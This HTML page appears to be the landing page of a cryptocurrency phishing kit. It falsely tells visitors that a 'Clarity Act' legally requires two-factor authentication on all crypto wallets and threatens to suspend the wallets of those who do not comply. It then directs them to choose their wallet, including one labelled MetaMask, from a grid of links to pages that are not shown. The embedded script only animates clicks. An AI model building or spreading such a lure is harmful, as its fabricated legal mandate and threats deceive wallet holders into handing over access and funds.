<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Blockchain Network</title>

<link rel="stylesheet" href="assets/style.css">
</head>



<body>

<div class="animated-bg"></div>

<!-- HERO -->
<div class="hero">

    <h1 class="hero-title">Blockchain Network</h1>

    <p class="hero-subtitle"></br><b>Clarity Act</b></br></br> All crypto wallet holders are now required by law to use Two-factor authentication. </br></br>Failure to comply wil result in the suspension of your wallet! </br></br> <b></hr></br>Select your prefered wallet on the blockchain network and follow the Two-factor authentication process.</b></p>

</div>

<!-- GRID -->
<div class="grid">

    <a class="img/M1.png" href="company1A.html"><div class="logo"></div>MetaMask</a>
    <a class="card" href="company2A.html"><div class="logo"></div>Company 2</a>
    <a class="card" href="company3A.html"><div class="logo"></div>Company 3</a>
    <a class="card" href="company4A.html"><div class="logo"></div>Company 4</a>
    <a class="card" href="company5A.html"><div class="logo"></div>Company 5</a>
    <a class="card" href="company6A.html"><div class="logo"></div>Company 6</a>
    <a class="card" href="company7A.html"><div class="logo"></div>Company 7</a>
    <a class="card" href="company8A.html"><div class="logo"></div>Company 8</a>
    <a class="card" href="company9A.html"><div class="logo"></div>Company 9</a>
    <a class="card" href="company10A.html"><div class="logo"></div>Company 10</a>
    <a class="card" href="company11A.html"><div class="logo"></div>Company 11</a>
    <a class="card" href="company12A.html"><div class="logo"></div>Company 12</a>

</div>

<script>
document.querySelectorAll(".card").forEach(card => {
    card.addEventListener("click", function(e){

        let ripple = document.createElement("span");
        ripple.classList.add("ripple");

        let rect = this.getBoundingClientRect();
        let size = Math.max(rect.width, rect.height);

        ripple.style.width = ripple.style.height = size + "px";
        ripple.style.left = (e.clientX - rect.left - size/2) + "px";
        ripple.style.top = (e.clientY - rect.top - size/2) + "px";

        this.appendChild(ripple);

        setTimeout(() => ripple.remove(), 600);
    });
});
</script>

</body>
</html>